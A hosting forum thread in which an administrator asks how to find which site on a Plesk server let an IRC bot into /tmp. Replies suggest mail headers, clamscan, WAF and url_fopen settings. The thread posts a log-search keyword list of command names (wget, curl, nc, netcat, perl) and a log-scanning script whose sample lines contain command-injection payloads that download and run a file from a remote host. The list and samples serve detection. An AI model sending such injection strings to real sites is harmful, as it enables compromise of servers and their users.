Finding Site That Spam Payload was Dumped to

Community support for Plesk, CPanel, WebMin and others with insight from two of the founders of Plesk. Ask for help here! No question is too simple or complicated. :-)
KrazyBob
Forum Regular
Posts: 310
Joined: Mon Mar 19, 2007 3:47 pm

Finding Site That Spam Payload was Dumped to

Post by KrazyBob

I am getting pretty good at locating the string of the filename of a spam/irc/other injection script. But I have a hell of a time actually finding the site. I use:

Code: Select all

grep '/tmp/robots.txt' /var/www/vhosts/*/statistics/logs/*

or

Code: Select all

cat /var/www/vhosts/*/statistics/logs/* | grep '/tmp/robots.txt'

These seldom work. What are some other ways I might try?

Linux - Log File Search

Unscripted search phrases. Would love to make a script that would check each one...

+   '%20/tmp',
+   '%20/var',
+   '7z%20',
+   'apt-get%20',
+   'cat%20',
+   'cc%20',
+   'cd%20',
+   'crontab%20',
+   'curl%20',
+   'cvs%20',
+   'echo%20',
+   'elinks%20',
+   'emerge%20',
+   'ftp%20',
+   'GET%20',
+   'gcc%20',
+   'gzip%20',
+   'gunzip%20',
+   'HEAD%20',
+   'id%20',
+   'kill%20',
+   'killall%20',
+   'links%20',
+   'ls%20',
+   'lwp-download%20',
+   'lwp-request%20',
+   'lwp-mirror%20',
+   'lwp-rget%20',
+   'lynx%20',
+   'mail%20',
+   'mailx%20',
+   'mkdir%20',
+   'nc%20',
+   'ncftp%20',
+   'netcat%20',
+   'netstat%20',
+   'POST%20',
+   'perl%20',
+   'ps%20',
+   'python%20',
+   'rar%20',
+   'rexec%20',
+   'rm%20',
+   'rpm%20',
+   'ruby%20',
+   'scp%20',
+   'sh%20',
+   'smbclient%20',
+   'ssh%20',
+   'svn%20',
+   'tar%20',
+   'telnet%20',
+   'tftp%20',
+   'wget%20',
+   'uname%20',
+   'whoami%20',
+   'yum%20',
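A script of the kind asked for above, added here as an example (it is not code from this thread or from Plesk): it greps every vhost's access log for a subset of the listed phrases and prints the owning domain in front of each hit, so a match is attributed to a site instead of just being found. The /var/www/vhosts/<domain>/statistics/logs/access_log* layout is assumed, and the log lines in make_sample are constructed.

```sh
#!/bin/sh
# Added example, not code from the thread or from Plesk. Assumes the layout
# /var/www/vhosts/<domain>/statistics/logs/access_log*; sample lines below are constructed.

# Subset of the posted phrases as one extended regex. %20 is an encoded space, so
# 'wget%20' catches "wget <url>" smuggled through a query string. Short tokens such
# as 'sh%20' or 'cd%20' are noisy: treat hits as leads to read, not verdicts.
PHRASES='%20/tmp|%20/var|wget%20|curl%20|lwp-download%20|perl%20|python%20|sh%20|nc%20|netcat%20|cd%20|rm%20|echo%20|uname%20|whoami%20|kill%20|crontab%20'

# count_hits FILE: number of matching lines (prints 0 instead of failing on no match).
count_hits() {
    grep -E -i -c -- "$PHRASES" "$1" || true
}

# scan_log VHOST FILE: print "VHOST<TAB>logline" for every matching request.
scan_log() {
    grep -E -i -- "$PHRASES" "$2" | awk -v v="$1" '{ print v "\t" $0 }'
}

# scan_vhosts ROOT: walk ROOT/<domain>/statistics/logs and attribute hits to <domain>.
scan_vhosts() {
    for dir in "$1"/*/statistics/logs; do
        [ -d "$dir" ] || continue
        vhost=$(basename "$(dirname "$(dirname "$dir")")")
        for log in "$dir"/access_log*; do
            [ -f "$log" ] || continue
            scan_log "$vhost" "$log"
        done
    done
}

# make_sample ROOT: constructed two-vhost tree; one site carries an injection attempt.
make_sample() {
    mkdir -p "$1/good.example/statistics/logs" "$1/bad.example/statistics/logs"
    printf '%s\n' \
      '10.0.0.1 - - [12/Mar/2011:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512' \
      '10.0.0.1 - - [12/Mar/2011:10:00:02 +0000] "GET /about.html HTTP/1.1" 200 310' \
      > "$1/good.example/statistics/logs/access_log"
    printf '%s\n' \
      '10.0.0.2 - - [12/Mar/2011:10:05:01 +0000] "GET /gallery.php?img=home HTTP/1.1" 200 418' \
      '198.51.100.7 - - [12/Mar/2011:10:05:09 +0000] "GET /gallery.php?img=;cd%20/tmp;wget%20http://198.51.100.9/robots.txt HTTP/1.1" 200 77' \
      '198.51.100.7 - - [12/Mar/2011:10:05:11 +0000] "GET /gallery.php?img=;perl%20/tmp/robots.txt HTTP/1.1" 200 77' \
      > "$1/bad.example/statistics/logs/access_log"
}

# Dry run on the constructed tree; on a live server call: scan_vhosts /var/www/vhosts
root=$(mktemp -d)
make_sample "$root"
scan_vhosts "$root"
rm -rf "$root"
```

Rotated or compressed logs (access_log.processed, *.gz) are not covered by the glob; extend it or pipe through zcat for those.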
prupert
Forum Regular
Posts: 573
Joined: Tue Aug 01, 2006 2:45 pm
Location: Netherlands

Re: Finding Site That Spam Payload was Dumped to

Post by prupert

If the mail is sent via PHP the file name and UID are logged in the mail headers. Can't get any easier than that.
Lemonbit Internet Dedicated Server Management
KrazyBob
Forum Regular
Posts: 310
Joined: Mon Mar 19, 2007 3:47 pm

Re: Finding Site That Spam Payload was Dumped to

Post by KrazyBob

I'm sorry for the confusion, but mail was not mentioned at all. In fact the issue is an IRC bot that is activating init[0] twice. We found the files. The payloads were uploaded into the /tmp DIR and then deleted, as indicated by ps auxf and top -c when I grab the PID. I hope that this helps clarify the question.
faris
Long Time Forum Regular
Posts: 2321
Joined: Thu Dec 09, 2004 11:19 am

Re: Finding Site That Spam Payload was Dumped to

Post by faris

Nope, not clear at all. Sorry Bob!

Let me see if I'm on the right track:

The bad guys have managed to compromise a VPS (or a website on a VPS).
Although it could have been done in a different way, it was most probably achieved via a vulnerability in a website script (or by access to the site's username/password).

What you want to do now is identify which site is/was compromised.

Is all that correct?

If so....

Have you tried that script I mentioned a while ago -- the one the Parallels people released that looks for certain types of compromises and removes them? However, if that gets any hits, a mass username/password change would be in order, I think.

Does clamscan give a clean bill of health on everything in /var/www/ ? (and indeed the entire server, once you have removed the harmful stuff)?

Have you tried looking in the logs for clamd/clamav events? I'm thinking that if they used FTP (and you have the FTP clamd upload scanning enabled), 99.99% of bad stuff would have been blocked. Maybe they tried lots of different scripts until they found one that slipped through? In which case you might be able to identify which site it was.

The same would apply to the Plesk FileManager if you have the Plesk WAF enabled.

Is url_fopen disabled?
--------------------------------
<advert>
If you want to rent a UK-based VPS that comes with friendly advice and support from a fellow ART fan, please get in touch.
</advert>